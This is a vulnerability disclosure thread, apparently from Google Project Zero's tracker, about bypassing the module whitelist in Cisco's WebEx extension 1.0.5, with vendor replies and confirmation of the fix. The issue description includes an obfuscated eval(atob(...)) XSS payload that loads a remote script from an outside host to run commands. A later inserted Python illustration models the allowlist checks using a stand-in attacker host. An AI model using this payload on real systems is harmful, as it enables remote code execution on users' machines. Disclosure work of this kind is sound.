
Issue 1100


Issue metadata

Status: Fixed
Closed: Jan 2017

Blocked on: issue 1324, issue 1096


Cisco: WebEx: New Arbitrary Command Execution in 1.0.5 via Module Whitelist Bypass

Project Member Reported by, Jan 25 2017

Issue description

In version 1.0.5 of the WebEx extension, Cisco added a GpcComponentName whitelist to prevent exploitation via XSS, preventing issue 1096.

This can be defeated by putting a module signed by Cisco under GpcUrlRoot, and tricking the installation routine to overwrite one of the whitelisted modules with it. As I already have a copy of MSVCRT.DLL signed by Cisco, I used this one in my exploit.

This requires an XSS on *, but they're unfortunately not difficult to find.

Here is a working example:");eval(atob("ZD1kb2N1bWVudDsocz1kLmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpKS5zcmM9Jy8vbG9jay5jbXB4Y2hnOGIuY29tL0pvUGhlaTdhL3dlYmV4LmpzJztkLmhlYWQuYXBwZW5kQ2hpbGQocyk7"));("

(The eval just loads this script:

Please note that the script waits 10 seconds before running calc.exe to make sure everything is loaded.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.

Attachment: Windows 10-2017-01-24-19-23-30.png (822 KB)
Project Member

Comment 1 by, Jan 25 2017

Project Member

Comment 2 by, Jan 25 2017

Project Member

Comment 3 by, Jan 25 2017

I made some minor changes to the exploit script.
(attachment, 7.1 KB)
Project Member

Comment 4 by, Jan 26 2017

Hi Tavis,

We are tracking this issue under the same ID as the previously reported issue: PSIRT-0085137008. Please include it on all communication to us regarding this vulnerability. I have also filed CSCvc88943 for our developers to investigate further.

Project Member

Comment 5 by, Jan 26 2017

Labels: -Restrict-View-Commit
Status: Fixed (was: New)
It looks like Cisco have released version 1.0.7, which adds a whitelist for the GpcExtName and GpcUnpackName properties that I was using in my exploit.

It looks like they correctly handle Mac and Windows, and have also added some verification on GpcInitCall/GpcExitCall/etc so that functions have to match a RegEx. This looks like a huge improvement.

Another very quick response from Cisco; I continue to be impressed with Cisco's response time.

I do not currently know of any way to defeat this new patch. As the patch is public now, let's mark this fixed.

(Note: I believe the XSS is an independently discovered duplicate of CVE-2009-3731, which is already public).
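As an added illustration, not the extension's code and not Cisco's actual allowlists or regex (the thread does not give them): a model of the two checking regimes this thread describes, the 1.0.5 component-name-only check and the 1.0.7 check on GpcExtName, GpcUnpackName and the Gpc*Call names, run against a constructed parameter set in the shape of the reported bypass. The strict mode, which rejects unknown Gpc* fields outright, goes beyond what the thread describes.

```python
import re

# Constructed allowlists and regex: the thread does not give the extension's
# real values, so these are assumptions for the model, not Cisco's policy.
NAME_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]{0,63}$")
COMPONENTS = frozenset({"gpc_core.dll", "gpc_ui.dll", "msvcrt.dll"})

# Models 1.0.5 as described: only GpcComponentName is allowlisted.
COMPONENT_ONLY_POLICY = {"GpcComponentName": COMPONENTS}

# Models 1.0.7 as comment 5 reports it: GpcExtName and GpcUnpackName are
# allowlisted too, and the Gpc*Call function names must match a regex.
FULL_POLICY = {
    "GpcComponentName": COMPONENTS,
    "GpcExtName": frozenset({"gpc_core", "gpc_ui"}),
    "GpcUnpackName": frozenset({"gpc_core.pkg", "gpc_ui.pkg"}),
    "GpcInitCall": NAME_RE,
    "GpcExitCall": NAME_RE,
}

def violations(params, policy, strict=False):
    """Sorted names of parameters failing the policy ([] = accepted). With
    strict=True (beyond the thread), Gpc* fields the policy has no rule for
    are rejected too, deny by default, instead of being passed through."""
    bad = []
    for name, value in params.items():
        rule = policy.get(name)
        if rule is None:
            if strict and name.startswith("Gpc"):
                bad.append(name)
            continue
        if isinstance(rule, frozenset):
            ok = value.lower() in rule
        else:
            ok = rule.fullmatch(value) is not None
        if not ok:
            bad.append(name)
    return sorted(bad)

# Constructed request in the shape of the reported bypass: an allowlisted component
# name, but an attacker-hosted root, a colliding unpack name and a non-symbol init call.
BYPASS_PARAMS = {
    "GpcComponentName": "msvcrt.dll",
    "GpcUrlRoot": "https://attacker.invalid/modules/",
    "GpcExtName": "msvcrt",
    "GpcUnpackName": "msvcrt.dll",
    "GpcInitCall": "Init();Other",
    "GpcExitCall": "Exit",
}
```

The component-only policy accepts BYPASS_PARAMS; the full policy reports the ext, unpack and init fields, and strict mode additionally flags the unchecked GpcUrlRoot.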
Project Member

Comment 6 by, Jan 26 2017

Cisco's advisory is here

Apparently Firefox and Internet Explorer were also affected, but not on Mac or Linux. I didn't check, but have no reason to doubt Cisco's assessment.
Project Member

Comment 7 by, Feb 3 2017

Labels: -Reported-2017-01-24 Reported-2017-Jan-24

Comment 8 Deleted

Comment 9 Deleted

Comment 10 Deleted

Project Member

Comment 11 by, Jul 6 2017

Blockedon: 1324
